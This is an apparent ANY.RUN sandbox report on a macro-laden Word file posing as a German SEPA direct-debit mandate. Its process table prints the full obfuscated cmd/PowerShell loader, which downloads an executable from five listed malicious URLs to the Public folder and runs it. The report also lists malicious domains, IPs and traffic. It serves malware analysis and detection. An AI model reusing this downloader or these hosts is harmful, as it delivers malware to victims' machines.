analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | SEPA-Lastschriftmandat.doc |
| Full analysis: | https://app.any.run/tasks/a628b677-215e-4200-8f6a-14052a28a605 |
| Verdict: | Malicious activity |
| Analysis date: | January 23, 2019, 08:25:21 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | text/xml |
| File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
| MD5: | 900E14F8C1D6107FCCA4B6BE84104FB6 |
| SHA1: | 2AA02AC41CE7CD3A8D3746D7FFA73CE7F9D38088 |
| SHA256: | FA2A9972975EEE1AC59EDA3149892BEEB2C51949AB3221CDEDA6A51908878617 |
| SSDEEP: | 6144:sGRburjr1HK13DG3kWEXa8GeQEDzYUTE7yZRVUi8E:sGR2w13UpEXa8GejzEmZRGi7 |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 2848)
Executes PowerShell scripts
- cmd.exe (PID: 4016)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 2848)
SUSPICIOUS
Executes application which crashes
- powershell.exe (PID: 2576)
Creates files in the user directory
- powershell.exe (PID: 2576)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 2848)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2848)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
|---|---|---|
| .xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
| .xml | | | Generic XML (ASCII) (2.3) |
| .html | | | HyperText Markup Language (1.4) |
EXIF
XMP
| WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
|---|---|
| WordDocumentBodySectSectPrColsSpace: | 720 |
| WordDocumentBodySectSectPrPgMarGutter: | - |
| WordDocumentBodySectSectPrPgMarFooter: | 720 |
| WordDocumentBodySectSectPrPgMarHeader: | 720 |
| WordDocumentBodySectSectPrPgMarLeft: | 1440 |
| WordDocumentBodySectSectPrPgMarBottom: | 1440 |
| WordDocumentBodySectSectPrPgMarRight: | 1440 |
| WordDocumentBodySectSectPrPgMarTop: | 1440 |
| WordDocumentBodySectSectPrPgSzH: | 15840 |
| WordDocumentBodySectSectPrPgSzW: | 12240 |
| WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
| WordDocumentBodySectPRT: | |
| WordDocumentBodySectPRPictShapeImagedataTitle: | - |
| WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
| WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square |
| WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
| WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
| WordDocumentBodySectPRPictShapeId: | Picture 1 |
| WordDocumentBodySectPRPictBinData: | (Binary data 111550 bytes, use -b option to extract) |
| WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
| WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
| WordDocumentBodySectPRPictShapetypeLockExt: | edit |
| WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
| WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
| WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
| WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
| WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
| WordDocumentBodySectPRPictShapetypeStroked: | f |
| WordDocumentBodySectPRPictShapetypeFilled: | f |
| WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
| WordDocumentBodySectPRPictShapetypePreferrelative: | t |
| WordDocumentBodySectPRPictShapetypeSpt: | 75 |
| WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
| WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
| WordDocumentBodySectPRRPrNoProof: | - |
| WordDocumentBodySectPRRsidRPr: | 0064671E |
| WordDocumentBodySectPRsidRDefault: | 00530C4E |
| WordDocumentBodySectPRsidR: | 005E6EE1 |
| WordDocumentDocPrRsidsRsidVal: | 00530C4E |
| WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
| WordDocumentDocPrCompatDontGrowAutofit: | - |
| WordDocumentDocPrCompatUseAsianBreakRules: | - |
| WordDocumentDocPrCompatWrapTextWithPunct: | - |
| WordDocumentDocPrCompatSnapToGridInCell: | - |
| WordDocumentDocPrCompatBreakWrappedTables: | - |
| WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
| WordDocumentDocPrIgnoreMixedContentVal: | off |
| WordDocumentDocPrSaveInvalidXMLVal: | off |
| WordDocumentDocPrValidateAgainstSchema: | - |
| WordDocumentDocPrPixelsPerInchVal: | 120 |
| WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
| WordDocumentDocPrOptimizeForBrowser: | - |
| WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
| WordDocumentDocPrPunctuationKerning: | - |
| WordDocumentDocPrDefaultTabStopVal: | 720 |
| WordDocumentDocPrDoNotEmbedSystemFonts: | - |
| WordDocumentDocPrRemovePersonalInformation: | - |
| WordDocumentDocPrZoomPercent: | 100 |
| WordDocumentDocPrViewVal: | |
| WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
| WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
| WordDocumentShapeDefaultsShapelayoutExt: | edit |
| WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
| WordDocumentShapeDefaultsShapedefaultsExt: | edit |
| WordDocumentDocSuppDataBinData: | (Binary data 148020 bytes, use -b option to extract) |
| WordDocumentDocSuppDataBinDataName: | editdata.mso |
| WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
| WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
| WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
| WordDocumentStylesStyleRsidVal: | 005A24B1 |
| WordDocumentStylesStyleLinkVal: | BalloonTextChar |
| WordDocumentStylesStyleBasedOnVal: | Normal |
| WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
| WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
| WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
| WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
| WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
| WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
| WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
| WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
| WordDocumentStylesStyleTblPrTblIndType: | dxa |
| WordDocumentStylesStyleTblPrTblIndW: | - |
| WordDocumentStylesStyleUiNameVal: | Table Normal |
| WordDocumentStylesStyleRPrLangBidi: | AR-SA |
| WordDocumentStylesStyleRPrLangFareast: | EN-US |
| WordDocumentStylesStyleRPrLangVal: | EN-US |
| WordDocumentStylesStyleRPrSz-csVal: | 22 |
| WordDocumentStylesStyleRPrSzVal: | 22 |
| WordDocumentStylesStyleRPrFontVal: | Calibri |
| WordDocumentStylesStylePPrSpacingLine-rule: | auto |
| WordDocumentStylesStylePPrSpacingLine: | 259 |
| WordDocumentStylesStylePPrSpacingAfter: | 160 |
| WordDocumentStylesStyleNameVal: | Normal |
| WordDocumentStylesStyleStyleId: | Normal |
| WordDocumentStylesStyleDefault: | on |
| WordDocumentStylesStyleType: | paragraph |
| WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
| WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
| WordDocumentStylesLatentStylesDefLockedState: | off |
| WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
| WordDocumentFontsFontSigCsb-1: | 00000000 |
| WordDocumentFontsFontSigCsb-0: | 000001FF |
| WordDocumentFontsFontSigUsb-3: | 00000000 |
| WordDocumentFontsFontSigUsb-2: | 00000009 |
| WordDocumentFontsFontSigUsb-1: | C0007841 |
| WordDocumentFontsFontSigUsb-0: | E0002AFF |
| WordDocumentFontsFontPitchVal: | variable |
| WordDocumentFontsFontFamilyVal: | Roman |
| WordDocumentFontsFontCharsetVal: | 00 |
| WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
| WordDocumentFontsFontName: | Times New Roman |
| WordDocumentFontsDefaultFontsCs: | Times New Roman |
| WordDocumentFontsDefaultFontsH-ansi: | Calibri |
| WordDocumentFontsDefaultFontsFareast: | Calibri |
| WordDocumentFontsDefaultFontsAscii: | Calibri |
| WordDocumentDocumentPropertiesVersion: | 16 |
| WordDocumentDocumentPropertiesCharactersWithSpaces: | 36 |
| WordDocumentDocumentPropertiesParagraphs: | 1 |
| WordDocumentDocumentPropertiesLines: | 1 |
| WordDocumentDocumentPropertiesCharacters: | 32 |
| WordDocumentDocumentPropertiesWords: | 5 |
| WordDocumentDocumentPropertiesPages: | 1 |
| WordDocumentDocumentPropertiesLastSaved: | 2019:01:17 06:38:00Z |
| WordDocumentDocumentPropertiesCreated: | 2019:01:17 06:38:00Z |
| WordDocumentDocumentPropertiesTotalTime: | - |
| WordDocumentDocumentPropertiesRevision: | 1 |
| WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
| WordDocumentOcxPresent: | no |
| WordDocumentEmbeddedObjPresent: | no |
| WordDocumentMacrosPresent: | yes |
Total processes
36
Monitored processes
4
Malicious processes
2
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2848 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\SEPA-Lastschriftmandat.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 4016 | "C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $invoice50='AGP67';$Incredible65=new-object Net.WebClient;$Strategist35='http://highclass-store.co/NzDOK_DeMJ9_tU@http://baskanligagidenyol.com/1iSd7Z8y_h1Ocq_hmfW4vH7L@http://xdr1.worldcupdeals.net/lAvLC_PBfsCn2u@http://copsnailsanddrinks.fr/xvfJWVVk_XU1eI_xgRV5il2e@http://jauniejizalieji.lt/069P_JsyDbKmkZ_r4UUahza'.Split('@');$Consultant83='Landing79';$stable20 = '841';$ComoroFranc6='Denmark1';$parse70=$env:public+'\'+$stable20+'.exe';foreach($National3 in $Strategist35){try{$Incredible65.DownloadFile($National3, $parse70);$sticky99='Forward55';If ((Get-Item $parse70).length -ge 80000) {Invoke-Item $parse70;$harness71='TrinidadandTobagoDollar26';break;}}catch{}}$Tactics33='violet76'; | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 2576 | powershell $invoice50='AGP67';$Incredible65=new-object Net.WebClient;$Strategist35='http://highclass-store.co/NzDOK_DeMJ9_tU@http://baskanligagidenyol.com/1iSd7Z8y_h1Ocq_hmfW4vH7L@http://xdr1.worldcupdeals.net/lAvLC_PBfsCn2u@http://copsnailsanddrinks.fr/xvfJWVVk_XU1eI_xgRV5il2e@http://jauniejizalieji.lt/069P_JsyDbKmkZ_r4UUahza'.Split('@');$Consultant83='Landing79';$stable20 = '841';$ComoroFranc6='Denmark1';$parse70=$env:public+'\'+$stable20+'.exe';foreach($National3 in $Strategist35){try{$Incredible65.DownloadFile($National3, $parse70);$sticky99='Forward55';If ((Get-Item $parse70).length -ge 80000) {Invoke-Item $parse70;$harness71='TrinidadandTobagoDollar26';break;}}catch{}}$Tactics33='violet76'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 3352 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
Total events
1 330
Read events
930
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
3
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8822.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4EBE8D7.jpg | — | |
MD5:— | SHA256:— | |||
| 2576 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BRY5BTCM5YWZROO9PR3F.temp | — | |
MD5:— | SHA256:— | |||
| 2576 | powershell.exe | C:\Users\Public\841.exe | — | |
MD5:— | SHA256:— | |||
| 3352 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsEA18.tmp | — | |
MD5:— | SHA256:— | |||
| 3352 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsEA28.tmp | — | |
MD5:— | SHA256:— | |||
| 2576 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
| 2576 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199466.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
| 2848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$PA-Lastschriftmandat.doc | pgc | |
MD5:4E3059A3C743F21AD89C992A1B0A2219 | SHA256:2F5A8FE7949343129EE947D2B2EF92471AA84469EB85037168BB40FD77944B92 | |||
| 2848 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B63E0CADFFAD2BE15CACE5098449DE7D | SHA256:0C4292C028F0E13DB0AC7C146510D071B680F092A5576337DB213B97E3A17A6A | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
4
DNS requests
5
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2576 | powershell.exe | GET | 302 | 75.98.175.121:80 | http://highclass-store.co/NzDOK_DeMJ9_tU | US | html | 224 b | malicious |
2576 | powershell.exe | GET | 200 | 75.98.175.121:80 | http://ssr13.supercp.com/suspended.page/ | US | html | 605 b | malicious |
2576 | powershell.exe | GET | 301 | 164.132.235.17:80 | http://copsnailsanddrinks.fr/xvfJWVVk_XU1eI_xgRV5il2e | FR | html | 262 b | malicious |
2576 | powershell.exe | GET | 301 | 94.73.147.165:80 | http://baskanligagidenyol.com/1iSd7Z8y_h1Ocq_hmfW4vH7L | TR | html | 617 b | malicious |
2576 | powershell.exe | GET | 200 | 164.132.235.17:80 | http://copsnailsanddrinks.fr/xvfJWVVk_XU1eI_xgRV5il2e/ | FR | binary | 228 Kb | malicious |
2576 | powershell.exe | GET | 404 | 94.73.147.165:80 | http://baskanligagidenyol.com/1iSd7Z8y_h1Ocq_hmfW4vH7L/ | TR | html | 1.12 Kb | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2576 | powershell.exe | 94.73.147.165:80 | baskanligagidenyol.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | suspicious |
2576 | powershell.exe | 164.132.235.17:80 | copsnailsanddrinks.fr | OVH SAS | FR | malicious |
2576 | powershell.exe | 75.98.175.121:80 | highclass-store.co | A2 Hosting, Inc. | US | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
highclass-store.co |
| malicious |
ssr13.supercp.com |
| malicious |
baskanligagidenyol.com |
| malicious |
xdr1.worldcupdeals.net |
| unknown |
copsnailsanddrinks.fr |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2576 | powershell.exe | Potentially Bad Traffic | ET WEB_CLIENT eval String.fromCharCode String Which May Be Malicious |
2576 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io) |
2576 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] Redirection JScript Obfuscated (seen Banload) |